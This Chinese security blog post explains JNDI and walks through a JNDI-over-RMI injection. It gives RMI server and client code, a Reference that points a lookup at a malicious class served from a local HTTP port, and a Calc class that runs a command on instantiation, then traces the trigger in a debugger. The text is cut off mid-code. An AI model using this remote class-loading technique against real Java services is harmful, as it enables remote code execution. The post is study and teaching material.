

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=light>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/bb.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="	#ADD8E6">
  <meta name="author" content="bxhhf">
  <meta name="keywords" content="">
  
    <meta name="description" content="一.简介简述 JNDI（Java Naming and Directory Interface）是 Java 提供的标准命名和目录接口，通过统一的 JNDI API 使 java 应用程序能够访问各种命名和目录服务。它允许开发人员以统一的方式查找和访问资源，如用户、网络、机器和服务等。 JNDI SPI SPI 即服务提供者接口，JNDI 架构由 API 和服务提供者接口 (SPI) 组成。SPI">
<meta property="og:type" content="article">
<meta property="og:title" content="JNDI">
<meta property="og:url" content="https://bxhhf.github.io/2025/10/13/yuque-hexo-post/JNDI/index.html">
<meta property="og:site_name" content="bxhhf">
<meta property="og:description" content="一.简介简述 JNDI（Java Naming and Directory Interface）是 Java 提供的标准命名和目录接口，通过统一的 JNDI API 使 java 应用程序能够访问各种命名和目录服务。它允许开发人员以统一的方式查找和访问资源，如用户、网络、机器和服务等。 JNDI SPI SPI 即服务提供者接口，JNDI 架构由 API 和服务提供者接口 (SPI) 组成。SPI">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/56492498/1758768820049-8f42de40-021c-44c4-bd87-314e72814ea6.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758790862823-ed648997-a986-487f-b105-160c9b7d170f.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758803952896-ae3f4bf6-c091-4859-b826-16eb21d61bb7.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758806564213-2454873e-2845-453c-832a-072f42fee697.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758806638022-0a222780-b93a-4a02-8d2f-3274ee975931.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758856651794-e5923257-b70a-4de5-965c-9f9cc243ee95.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758857411316-855acc6b-0637-4816-b3a8-a98cf5a120c9.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758873011684-d5e3ee2b-64ff-4cb6-8b3c-c1bb275031e0.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758890412466-e118d5eb-3beb-43ce-ae66-93fdff9515dd.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758873651923-73f81e40-a6a7-42f9-884d-c61f1754c767.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758874108009-d341a86d-2675-423e-9986-06303929e538.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758874358953-c0aea2da-7f36-4508-addf-6f9c5765fb3f.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1759046973912-fd978054-2b87-4029-9942-00bcb31acbb0.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1759047252047-06641098-2145-49b7-8569-d8bb0a7037d8.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1759056980994-7d8e90bb-ec1b-4f5a-b3f8-bf2d4345498e.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760348343499-7911a206-16e3-4d32-bc52-3886850e2c6c.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760343901459-d6aeab1e-8aa5-46ea-8597-c9a8029b8836.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760344122583-0ccb4d4b-d897-486d-9c34-0a4390cecdd0.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760346981007-cb812685-08e5-42fc-a9a6-f446938e78b5.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760347395455-69fa7e5f-26f7-4947-afff-f011063ebf13.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760359920994-528a732c-df8a-4be2-ba74-528268778cb0.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760364752734-784d9218-628a-4f0e-9859-94fca028b652.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760358708317-4b3b8c97-d7ee-4f08-9aa8-b7cfeaa2718d.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760580954198-2611e22b-0b28-409f-9305-f129c9dd9bfb.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760584437987-3f3b9734-a845-49d3-b6f0-510afe345384.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760585829309-d90720cc-d3e0-4191-8285-1105f557054f.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760586156819-267e6c5f-ec84-45dd-a564-6b22717c8dd1.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760586104945-c8ff935b-9a01-4abe-9d81-ae41dcaee96d.png">
<meta property="og:image" content="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760597349627-2c317030-83ce-465a-8d14-b305da0f90fd.png">
<meta property="article:published_time" content="2025-10-13T14:13:24.000Z">
<meta property="article:modified_time" content="2025-10-29T01:41:31.915Z">
<meta property="article:author" content="bxhhf">
<meta property="article:tag" content="JNDI">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2025/png/56492498/1758768820049-8f42de40-021c-44c4-bd87-314e72814ea6.png">
  
  
  
  <title>JNDI - bxhhf</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/c/font_3846514_kabxni94auf.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/shubiao.css">
<link rel="stylesheet" href="/css/glassBg.css">
<link rel="stylesheet" href="/css/sign.css">
<link rel="stylesheet" href="/css/scrollAnimation.css">
<link rel="stylesheet" href="/css/code.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"bxhhf.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"enable":true,"app_id":"AN6AZUYA9oJo0TesuVqbgX1I-gzGzoHsz","app_key":"gbgqDB024hr2I7jmwbO6Mz2a","server_url":"https://an6azuya.lc-cn-n1-shared.com","enable_sync":false,"path":"window.location.pathname","ignore_local":true},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<!-- hexo injector head_end start --><link rel="stylesheet" href="https://registry.npmmirror.com/lxgw-wenkai-screen-web/latest/files/style.min.css" /><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong class="navbar-title">bxhhf&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/17.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.1)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="JNDI"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-13 22:13" pubdate>
          2025年10月13日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          40 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">JNDI</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="一-简介"><a href="#一-简介" class="headerlink" title="一.简介"></a>一.简介</h1><p><strong>简述</strong></p>
<p><font style="color:rgb(51, 51, 51);">JNDI（Java Naming and Directory Interface）是 Java 提供的标准命名和目录接口，</font><strong><font style="color:rgb(51, 51, 51);">通过统一的 JNDI API 使 java 应用程序能够访问各种命名和目录服务。</font></strong><font style="color:rgb(51, 51, 51);">它允许开发人员以统一的方式查找和访问资源，如用户、网络、机器和服务等。</font></p>
<p><strong>JNDI SPI</strong></p>
<p><font style="color:rgb(0, 0, 0);">SPI 即服务提供者接口，JNDI 架构由 API 和服务提供者接口 (SPI) 组成。SPI 支持以透明方式插入各种命名和目录服务，所以我们的应用能使用 JNDI 的 API 访问相关服务的接口</font></p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/56492498/1758768820049-8f42de40-021c-44c4-bd87-314e72814ea6.png" srcset="/img/loading.gif" lazyload></p>
<p><font style="color:rgb(0, 0, 0);">JDK 提供了以下服务和接口：</font></p>
<ul>
<li><font style="color:rgb(0, 0, 0);">LDAP ：轻量级目录访问协议，约定了 Client 与 Server 之间的信息交互格式、使用的端口号、认证方式等内容</font></li>
<li><font style="color:rgb(0, 0, 0);">通用对象请求代理体系结构 (CORBA) 通用对象服务 (COS) 名称服务</font></li>
<li><font style="color:rgb(0, 0, 0);">RMI： JAVA 远程方法协议,调用 java 远程服务器上的对象</font></li>
<li><font style="color:rgb(0, 0, 0);">域：服务 (DNS)</font></li>
</ul>
<p>前三种都满足一个字符串绑定一个对象，其中漏洞涉及最多的是 LDAP 和 RMI 两种服务接口</p>
<hr>
<p><font style="color:rgb(0, 0, 0);">简单了解一下命名服务和目录服务：</font></p>
<p><strong>命名服务</strong></p>
<p><font style="color:rgb(0, 0, 0);">命名服务：将 java 对象以某个名称的形式绑定 bind 到</font><strong><font style="color:rgb(0, 0, 0);">容器环境 Context 中（容器环境也就是上下文，在后续调试过程中要关注的)</font></strong><font style="color:rgb(0, 0, 0);">。(容器环境本身也是一个 java 对象)，之后调用容器可以查找出名称绑定的 java 对象。例如：RMI 通过名称查找并调用远程对象，DNS 通过域名查找 ip。它们都是命名服务</font></p>
<p><strong>目录服务</strong></p>
<p><font style="color:rgb(0, 0, 0);">目录服务是命名服务的扩展，主要的区别在于</font><strong><font style="color:rgb(0, 0, 0);">目录容器环境 DirContext</font></strong><font style="color:rgb(0, 0, 0);">中保存的是对象的属性信息，而不是对象本身，所以，目录提供的是对属性的各种操作，也就是说它的容器环境中绑定的是对象的属性。例如：LDAP </font></p>
<p><font style="color:rgb(0, 0, 0);">以上是 JNDI 的四个服务，对应四个包外加一个主包</font></p>
<ul>
<li><font style="color:rgb(0, 0, 0);">javax.naming</font></li>
<li><font style="color:rgb(0, 0, 0);">javax.naming.directory</font></li>
<li><font style="color:rgb(0, 0, 0);">javax.naming.event</font></li>
<li><font style="color:rgb(0, 0, 0);">javax.naming.ldap</font></li>
<li><font style="color:rgb(0, 0, 0);">javax.naming.spi</font></li>
</ul>
<blockquote>
<p><font style="color:rgb(0, 0, 0);">JNDI API 中提供的代表目录容器环境的类为 DirContext，DirContext 是 Context 的子类</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">NDI API 中提供了一个 InitialDirContext 类来创建用作 JNDI 命名与目录属性操作的入口 DirContext 对象</font><font style="color:rgb(0, 0, 0);">。</font></p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/drunkPullBreeze/p/15466001.html">https://www.cnblogs.com/drunkPullBreeze/p/15466001.html</a></p>
<p>JNDI 详细介绍</p>
<h1 id="二-JDNI-结合-RMI-的原生漏洞"><a href="#二-JDNI-结合-RMI-的原生漏洞" class="headerlink" title="二.JDNI 结合 RMI 的原生漏洞"></a><font style="color:rgb(0, 0, 0);">二.JDNI 结合 RMI 的原生漏洞</font></h1><p><font style="color:rgb(0, 0, 0);"> </font></p>
<p>服务端：实例化了一个初始化上下文对象，用它来执行对应的操作 bind</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs plain">public class RMIServer &#123;<br>    public static void main(String[] args) throws Exception&#123;<br>        Registry registry = LocateRegistry.createRegistry(1099);<br><br>        InitialContext initialContext=new InitialContext();<br>        initialContext.rebind(&quot;rmi://localhost:1099/remoteObj&quot;, new RemoteObjImpl());<br><br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>客户端</p>
<p>API 是用的 JDNI 的，还是初始化上下文对象进行查找远程对象</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plain">public class RMIClient &#123;<br>    public static void main(String[] args) throws NamingException, RemoteException, ClassNotFoundException, InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException &#123;<br>        String uri = &quot;rmi://127.0.0.1:1099/remoteObj&quot;;<br>        InitialContext initialContext = new InitialContext();<br>        IRemoteObj remoteObj = (IRemoteObj) initialContext.lookup(uri);<br>        System.out.println(remoteObj.sayhello(&quot;hello&quot;));<br><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(0, 0, 0);"></font></p>
<p><font style="color:rgb(0, 0, 0);"></font></p>
<p><strong><font style="color:rgb(0, 0, 0);">原生漏洞：</font></strong></p>
<p><font style="color:rgb(0, 0, 0);">客户端 lookup 查询,可以看到进入了 RegistryContext.lookup，底层走的还是 RegistryImpl_Stub.lookup 包括上面的 rebind 也是走的 RMI 中注册中心静态 stub 逻辑， 所以用 JNDI 接口访问 RMI，</font><strong><font style="color:rgb(0, 0, 0);">底层还是走的原生的 RMI 服务</font></strong><font style="color:rgb(0, 0, 0);">，当他们两个结合起来使用，RMI 的漏洞也是同样适用的</font></p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758790862823-ed648997-a986-487f-b105-160c9b7d170f.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758803952896-ae3f4bf6-c091-4859-b826-16eb21d61bb7.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="三-JNDI-注入漏洞"><a href="#三-JNDI-注入漏洞" class="headerlink" title="三.JNDI 注入漏洞"></a>三.JNDI 注入漏洞</h1><h2 id="3-1-JNDI-RMI"><a href="#3-1-JNDI-RMI" class="headerlink" title="3.1 JNDI+RMI"></a>3.1 JNDI+RMI</h2><p>简单来说：JNDI 注入就是从远程工厂位置动态加载恶意类，造成客户端的攻击。</p>
<p>RMI 绑定的是远程对象，传统的 JNDI 注入是绑定的引用对象。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Reference</span> <span class="hljs-variable">reference</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Reference</span>(<span class="hljs-string">&quot;Calc&quot;</span>, <span class="hljs-string">&quot;Calc&quot;</span>, <span class="hljs-string">&quot;http://127.0.0.1:7000/&quot;</span>);<br></code></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">initialContext.rebind(<span class="hljs-string">&quot;rmi://localhost:1099/remoteObj&quot;</span>, reference);<br></code></pre></td></tr></table></figure>

<h3 id="1-1-Reference"><a href="#1-1-Reference" class="headerlink" title="1.1 Reference"></a>1.1 Reference</h3><p>即命名引用，构造方法：</p>
<p>引用本身并不持有对象数据，而是通过直接指针或句柄（特殊的指针） 2 种方式来访问真正的对象数据；</p>
<p>构造器：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plain">public Reference(String className, String factory, String factoryLocation) &#123;<br>    this(className);<br>    classFactory = factory;<br>    classFactoryLocation = factoryLocation;<br>&#125;<br></code></pre></td></tr></table></figure>

<ol>
<li><code>&lt;font style=&quot;background-color:rgb(249, 242, 244);&quot;&gt;className&lt;/font&gt;</code><font style="color:rgba(0, 0, 0, 0.75);"> - 远程加载时所使用的类名</font></li>
<li><code>&lt;font style=&quot;background-color:rgb(249, 242, 244);&quot;&gt;classFactory&lt;/font&gt;</code><font style="background-color:rgb(249, 242, 244);"> -工厂名</font></li>
<li><code>&lt;font style=&quot;background-color:rgb(249, 242, 244);&quot;&gt;classFactoryLocation&lt;/font&gt;</code><font style="background-color:rgb(249, 242, 244);"> - 工厂的位置</font></li>
</ol>
<blockquote>
<p>tips:既然都叫引用了，那就类似指针还有解引用，它相当于接下来说的 decodeObject 里面调用的 NamingManager.getObjectInstance</p>
</blockquote>
<h3 id="1-2-代码演示"><a href="#1-2-代码演示" class="headerlink" title="1.2 代码演示"></a>1.2 代码演示</h3><p>JNDI 注入与使用哪种服务无关，这里以 RMI 为例：</p>
<p><strong>服务端</strong>：相当于用 Reference 代理了远程对象，Reference 实例化时传参是将 Reference 对象绑定到了注册中心</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception&#123;<br>       <span class="hljs-type">Registry</span> <span class="hljs-variable">registry</span> <span class="hljs-operator">=</span> LocateRegistry.createRegistry(<span class="hljs-number">1099</span>);<br><br>       InitialContext initialContext=<span class="hljs-keyword">new</span> <span class="hljs-title class_">InitialContext</span>();<br>      <span class="hljs-comment">// initialContext.rebind(&quot;rmi://localhost:7000/remoteObj&quot;, new RemoteObjImpl());</span><br>       <span class="hljs-type">Reference</span> <span class="hljs-variable">reference</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Reference</span>(<span class="hljs-string">&quot;Calc&quot;</span>, <span class="hljs-string">&quot;Calc&quot;</span>, <span class="hljs-string">&quot;http://127.0.0.1:7000/&quot;</span>);<span class="hljs-comment">//恶意端口</span><br>       initialContext.rebind(<span class="hljs-string">&quot;rmi://localhost:1099/remoteObj&quot;</span>, reference);<br><br>   &#125;<br></code></pre></td></tr></table></figure>

<p><strong>恶意类</strong>：python 起一个服务指向设置的恶意端口 7000，并将恶意类编译后放在服务目录下（注意需要把 package 去掉，再进行编译，因为服务目录下是没有包目录的）</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs java"><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Calc</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_">Calc</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        Runtime.getRuntime().exec(<span class="hljs-string">&quot;calc&quot;</span>);<br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758806564213-2454873e-2845-453c-832a-072f42fee697.png" srcset="/img/loading.gif" lazyload></p>
<p><strong>客户端：</strong>JNDI 的 API 直接查询即可触发</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">RMIClient</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> NamingException, RemoteException, ClassNotFoundException, InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException &#123;<br>        <span class="hljs-type">String</span> <span class="hljs-variable">uri</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;rmi://127.0.0.1:1099/remoteObj&quot;</span>;<br>        <span class="hljs-type">InitialContext</span> <span class="hljs-variable">initialContext</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">InitialContext</span>();<br>        <span class="hljs-type">IRemoteObj</span> <span class="hljs-variable">remoteObj</span> <span class="hljs-operator">=</span> (IRemoteObj) initialContext.lookup(uri);<br>        System.out.println(remoteObj.sayhello(<span class="hljs-string">&quot;hello&quot;</span>));<br><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758806638022-0a222780-b93a-4a02-8d2f-3274ee975931.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="1-3-断点分析"><a href="#1-3-断点分析" class="headerlink" title="1.3 断点分析"></a>1.3 断点分析</h3><p>漏洞不是出现在远程交互时，而是在交互之后。我们看看客户端向注册中心查询时，怎么个流程就触发了漏洞</p>
<p>在客户端 lookup 下断点进行调试</p>
<p>首先先进入到之前说的 RegistryContext.lookup 这个容器环境的方法里面，之后是调用的 RMI 的原生方法—&gt;即执行 RegistryImpl_Stub 建立网络连接进行交互获得对象的逻辑</p>
<p>完成了交互，接着从 decodeObject 这里跟进去这里算是 JNDI 注入的连接入口，参数 var2 是查询之后的结果发现是 Reference 类是因为在服务端 rebind 的时候调用 encodeObject 进行转换</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758856651794-e5923257-b70a-4de5-965c-9f9cc243ee95.png" srcset="/img/loading.gif" lazyload></p>
<p><strong>RegistryContext.decodeObject</strong>：先是进行判断是否是 RemoteReference 类获得一个返回值,var3,定义为 Object 引用，var3 是封装的 Reference 对象里面包含有类名及加载类的地址，然后接下来重点关注的是 getObjectInstance 方法,传的前两个参数是 Reference 对象和工厂名称 name</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758857411316-855acc6b-0637-4816-b3a8-a98cf5a120c9.png" srcset="/img/loading.gif" lazyload></p>
<p><strong>NamingManager.getObjectInstance:</strong></p>
<p>buiilder 这里没有执行逻辑</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><code class="hljs plain">public static Object<br>    getObjectInstance(Object refInfo, Name name, Context nameCtx,<br>                      Hashtable&lt;?,?&gt; environment)<br>    throws Exception<br>&#123;<br><br>    ObjectFactory factory;<br><br>    // Use builder if installed<br>    ObjectFactoryBuilder builder = getObjectFactoryBuilder();<br>    if (builder != null) &#123;<br>        